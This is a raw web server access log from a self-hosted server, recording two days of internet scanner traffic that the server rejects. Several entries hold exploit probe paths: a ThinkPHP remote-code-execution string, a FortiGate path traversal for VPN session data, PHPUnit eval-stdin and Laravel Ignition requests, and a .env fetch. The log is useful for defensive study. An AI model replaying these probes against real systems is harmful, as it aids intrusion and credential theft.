[18/Nov/2021:18:59:08 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:18:59:25 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [18/Nov/2021:19:22:06 +0000] 444 - GET https 64.22.31.253 "/users/sign_in" [Client 91.121.78.141] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:19:30:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:20:53:01 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:20:53:02 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:21:16:36 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:21:16:36 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:21:48:44 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Nov/2021:22:15:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.226.4] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [18/Nov/2021:22:56:42 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 198.98.49.124] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Nov/2021:23:00:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Nov/2021:23:05:51 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 34.86.35.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Nov/2021:23:29:53 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.205.187] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Nov/2021:23:48:28 +0000] 400 - HEAD http localhost "/" [Client 159.223.38.198] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:23:48:29 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:30 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:32 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:33 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:34 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:34 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:36 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:37 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:38 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 159.223.38.198] [Length 252] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [18/Nov/2021:23:48:38 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 159.223.38.198] [Length 0] [Gzip -] "Roku/DVP-9.10 (289.10E04111A)" "-" [18/Nov/2021:23:48:39 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:40 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:42 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:42 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 159.223.38.198] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:48:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.223.38.198] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [18/Nov/2021:23:49:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.59] [Length 0] [Gzip -] "-" "-" [18/Nov/2021:23:49:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "-" "-" [18/Nov/2021:23:49:21 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Nov/2021:01:32:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [19/Nov/2021:01:37:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Nov/2021:01:48:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 198.98.49.124] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [19/Nov/2021:02:08:30 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.196.216] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Nov/2021:03:04:32 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:03:04:33 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:03:47:40 +0000] 444 - GET https localhost "/" [Client 170.106.115.15] [Length 0] [Gzip -] "curl/7.64.1" "-" [19/Nov/2021:04:23:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:04:48:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:05:04:04 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.196.197] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Nov/2021:05:34:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [19/Nov/2021:05:46:27 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:07:13:14 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 87.251.64.187] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:07:13:14 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 87.251.64.187] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:07:31:37 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [19/Nov/2021:07:53:26 +0000] 400 - GET https localhost "/kk2T" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:08:11:18 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.170.144.190] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:08:11:19 +0000] 444 - GET https 64.22.31.253 "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" [Client 185.170.144.190] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:08:15:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.205] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Nov/2021:08:29:19 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:08:39:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.140.248.32] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [19/Nov/2021:09:20:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:09:28:01 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:09:28:01 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:09:30:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 209.141.36.231] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [19/Nov/2021:09:32:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.252] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:09:41:05 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:09:55:15 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:09:55:16 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:10:11:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:10:34:11 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.77.162.3] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [19/Nov/2021:10:59:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:11:07:41 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 20.115.80.158] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [19/Nov/2021:11:09:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.32.180] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [19/Nov/2021:11:10:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 118.193.45.5] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [19/Nov/2021:11:11:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [19/Nov/2021:12:02:58 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:12:02:58 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:12:36:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.79.204.46] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:12:54:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:13:11:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.130] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [19/Nov/2021:13:11:18 +0000] 444 - OPTIONS https localhost "/" [Client 18.27.197.252] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:13:11:19 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 18.27.197.252] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:13:11:21 +0000] 400 - - https localhost "-" [Client 18.27.197.252] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:13:11:28 +0000] 400 - - https localhost "-" [Client 23.129.64.144] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:13:14:08 +0000] 444 - GET https www.sky-sport.net "/TOP/js/public.js" [Client 199.195.251.138] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36" "https://www.sky-sport.net" [19/Nov/2021:14:14:34 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:14:14:34 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:15:12:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:15:43:39 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:15:43:39 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:16:44:11 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.46.14] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Nov/2021:17:23:26 +0000] 400 - - http localhost "-" [Client 138.68.228.37] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:17:23:27 +0000] 400 - - http localhost "-" [Client 138.68.228.37] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:17:23:27 +0000] 400 - POST http 192.168.204.159 "/" [Client 138.68.228.37] [Length 252] [Gzip -] "WinHttpClient" "-" [19/Nov/2021:17:23:27 +0000] 400 - GET http 192.168.204.111 "/3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000" [Client 138.68.228.37] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" "-" [19/Nov/2021:17:46:15 +0000] 400 - - http localhost "-" [Client 167.172.52.119] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:17:49:28 +0000] 400 - - http localhost "-" [Client 167.172.54.16] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:18:00:09 +0000] 400 - - http localhost "-" [Client 165.227.2.207] [Length 154] [Gzip -] "-" "-" [19/Nov/2021:18:17:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.44] [Length 0] [Gzip -] "-" "-" [19/Nov/2021:18:17:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "-" "-" [19/Nov/2021:18:17:40 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.44] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Nov/2021:18:33:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [19/Nov/2021:18:39:39 +0000] 444 - GET https 64.22.31.253 "/login?returnURL=%2F" [Client 92.118.160.61] [Length 0] [Gzip -] "Go http package" "-" [19/Nov/2021:19:13:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:19:15:54 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.96.130.17] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [19/Nov/2021:20:00:00 +0000] 444 - GET https localhost "/" [Client 109.248.6.98] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [19/Nov/2021:20:20:09 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:20:20:10 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [19/Nov/2021:20:49:36 +0000] 444 - GET https 64.22.31.253 "/UI/Dashboard" [Client 92.118.160.5] [Length 0] [Gzip -] "Go http package" "-" [19/Nov/2021:21:10:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:21:45:52 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Nov/2021:22:46:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Nov/2021:23:34:21 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.214.5] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Nov/2021:00:27:25 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [20/Nov/2021:00:52:58 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Nov/2021:00:55:55 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:00:55:56 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [20/Nov/2021:01:17:08 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] 